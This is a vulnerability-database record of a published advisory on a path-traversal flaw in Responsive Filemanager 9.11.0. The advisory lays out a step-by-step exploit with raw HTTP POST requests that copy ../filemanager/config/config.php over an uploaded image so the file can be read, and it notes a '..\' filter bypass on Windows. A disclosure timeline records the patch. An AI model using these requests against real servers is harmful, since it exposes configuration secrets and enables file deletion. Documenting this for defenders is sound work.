{"lastseen": "2020-04-01T19:04:45", "references": [], "description": "\nResponsive Filemanger 9.11.0 - Arbitrary File Disclosure", "edition": 1, "reporter": "Wiswat Aswamenakul", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2017-02-07T00:00:00", "title": "Responsive Filemanger 9.11.0 - Arbitrary File Disclosure", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-02-07T00:00:00", "id": "EXPLOITPACK:786F9530DBEFEE36DA0CEF029665AC8F", "href": "", "viewCount": 6, "sourceData": "[+] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion\n[+] Date: 7 Feb 2017\n[+] Vulnerability and Exploit Author: Wiswat Aswamenakul\n[+] Vendor Homepage: http://www.responsivefilemanager.com/\n[+] Affected version: only tested on 9.11.0 and 9.7.3 (other versions might be affected)\n[+] Tested on: Ubuntu 14.04, PHP 5.5.9\n[+] Category: webapps\n\n[+] Description\nResponsive filemanger is a PHP based file manager that make use of AJAX\ntechnology. It has various useful features. One of them is copy/cut and\npaste files. However, the copy/cut feature does not santize file name\nthat will be copied/cut. Therefore, it is possible for attackers to\ncopied/cut any files including PHP files and paste them to overwrite\nexisting image files. Then, the attackers could download the overwritten\nimage files to read the content of the copied/cut files. Moreover, for\nthe cut feature, it can cause the original files to be deleted as well.\n\n[+] Exploit\n1. Upload a normal image file (jpg, png, gif) to a server\n2. Right click at any files, select copy and capture the request with Burp Suite (or any local proxy)\n3. Change parameter \"path\" to any file name that we would like to download, for example, path=../filemanager/config/config.php\n\n###\nPOST /fm/filemanager/ajax_calls.php?action=copy_cut HTTP/1.1\nHost: 192.168.1.128\nContent-Length: 53\nAccept: */*\nOrigin: http://192.168.1.128\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\nlike Gecko) Chrome/55.0.2883.87 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:\nhttp://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=%2F&5869110e2a073\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.8\nCookie: last_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0\nConnection: close\n\npath=../filemanager/config/config.php&sub_action=copy\n###\n\n4. Go to any sub directory, right click at any files, intercept the request with burp, select \"Paste to this directory\"\n5. Change parameter \"path\" to the image file uploaded in step 1, for example, path=subdir/size.png\n\n###\nPOST /fm/filemanager/execute.php?action=paste_clipboard HTTP/1.1\nHost: 192.168.1.128\nContent-Length: 20\nAccept: */*\nOrigin: http://192.168.1.128\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,\nlike Gecko) Chrome/55.0.2883.87 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:\nhttp://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en_EN&popup=0&crossdomain=0&field_id=&relative_url=0&akey=key&fldr=subdir%2F&5869110f9a268\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.8\nCookie: last_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0\nConnection: close\n\npath=subdir/size.png\n###\n\n6. Download the image file uploaded in step 1, it will contain content of the file specified in step 3\n\n[+] Note (about another issue I found)\nDuring this report, I found another separated issue with the attack filtering that only check for \"../\" but not \"..\\\" which can be used to bypass all filters if the application runs on Windows server and reported the issue to the owner as well. However, I found out that this issue was found by a guy from hacktizen and detailed in following blog post\nhttp://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html\nSo, the credit goes for the guy who firstly reported. Perhaps, the guy from hackitizen did not contact the owner of responsive filemanger or there are any problems with communication. Therefore, the issue remains unresolved.\n\n[+] Timeline\n- 02/01/2017: Contact Owner\n- 05/02/2017: Patched version is available\n- 07/02/2017: Public Advisory", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645789995}}
Responsive Filemanger 9.11.0 - Arbitrary File Disclosure